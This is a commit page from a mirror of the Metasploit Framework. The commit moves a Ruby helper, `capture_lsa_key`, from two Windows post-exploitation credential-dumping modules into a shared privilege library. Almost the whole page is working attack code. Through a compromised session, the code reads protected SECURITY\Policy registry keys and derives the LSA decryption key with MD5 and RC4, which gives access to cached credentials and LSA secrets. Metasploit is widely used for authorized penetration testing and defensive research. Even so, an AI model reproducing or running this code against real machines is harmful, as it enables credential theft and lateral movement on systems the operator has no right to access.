infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

move capture_lsa_key to priv

bug/bundler_fix
Rob Fuller 2013-10-16 23:45:28 -04:00
parent 1a9fcf2cbb
commit 60d8ee1434
3 changed files with 44 additions and 78 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

44
lib/msf/core/post/windows/priv.rb
View File

@ -151,4 +151,48 @@ module Msf::Post::Windows::Priv
return key.pack("C*")
end
#
# Returns the LSA key upon input of the unscrambled bootkey
#
def capture_lsa_key(bootkey)
begin
vprint_status("Getting PolSecretEncryptionKey...")
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ)
pol = ok.query_value("").data
vprint_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}")
ok.close
print_status("XP or below client")
@vista = 0
rescue
vprint_status("Trying 'V72' style...")
vprint_status("Getting PolEKList...")
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ)
pol = ok.query_value("").data
vprint_good("Pol: #{pol.unpack("H*")[0]}")
ok.close
print_status("Vista or above client")
@vista = 1
end
if( @vista == 1 )
lsakey = decrypt_lsa(pol, bootkey)
lsakey = lsakey[68,32]
vprint_good(lsakey.unpack("H*")[0])
else
md5x = Digest::MD5.new()
md5x << bootkey
(1..1000).each do
md5x << pol[60,16]
end
rc4 = OpenSSL::Cipher::Cipher.new("rc4")
rc4.key = md5x.digest
lsakey = rc4.update(pol[12,48])
lsakey << rc4.final
lsakey = lsakey[0x10..0x1F]
end
return lsakey
end
end

38
modules/post/windows/gather/cachedump.rb
View File

@ -53,44 +53,6 @@ class Metasploit3 < Msf::Post
end
end
def capture_lsa_key(bootkey)
begin
print_status("Getting PolSecretEncryptionKey...") if( datastore['DEBUG'] )
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ)
pol = ok.query_value("").data
print_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}") if( datastore['DEBUG'] )
ok.close
print_status("XP compatible client")
@vista = 0
rescue
print_status("Trying 'Vista' style...")
print_status("Getting PolEKList...") if( datastore['DEBUG'] )
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ)
pol = ok.query_value("").data
ok.close
print_status("Vista compatible client")
@vista = 1
end
if( @vista == 1 )
lsakey = decrypt_lsa(pol, bootkey)
lsakey = lsakey[68,32]
else
md5x = Digest::MD5.new()
md5x << bootkey
(1..1000).each do
md5x << pol[60,16]
end
rc4 = OpenSSL::Cipher::Cipher.new("rc4")
rc4.key = md5x.digest
lsakey = rc4.update(pol[12,48])
lsakey << rc4.final
lsakey = lsakey[0x10..0x1F]
end
return lsakey
end
def decrypt_secret(secret, key)
# Ruby implementation of SystemFunction005

40
modules/post/windows/gather/credentials/lsa.rb
View File

@ -30,46 +30,6 @@ class Metasploit3 < Msf::Post
))
end
def capture_lsa_key(bootkey)
begin
#print_status("Getting PolSecretEncryptionKey...")
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ)
pol = ok.query_value("").data
#print_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}")
ok.close
print_status("XP compatible client")
@vista = 0
rescue
#print_status("Trying 'V72' style...")
#print_status("Getting PolEKList...")
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ)
pol = ok.query_value("").data
#print_good("Pol: #{pol.unpack("H*")[0]}")
ok.close
print_status("V/7/2k8 compatible client")
@vista = 1
end
if( @vista == 1 )
lsakey = decrypt_lsa(pol, bootkey)
lsakey = lsakey[68,32]
#print_good(lsakey.unpack("H*")[0])
else
md5x = Digest::MD5.new()
md5x << bootkey
(1..1000).each do
md5x << pol[60,16]
end
rc4 = OpenSSL::Cipher::Cipher.new("rc4")
rc4.key = md5x.digest
lsakey = rc4.update(pol[12,48])
lsakey << rc4.final
lsakey = lsakey[0x10..0x1F]
end
return lsakey
end
def decrypt_secret(secret, key)
# Ruby implementation of SystemFunction005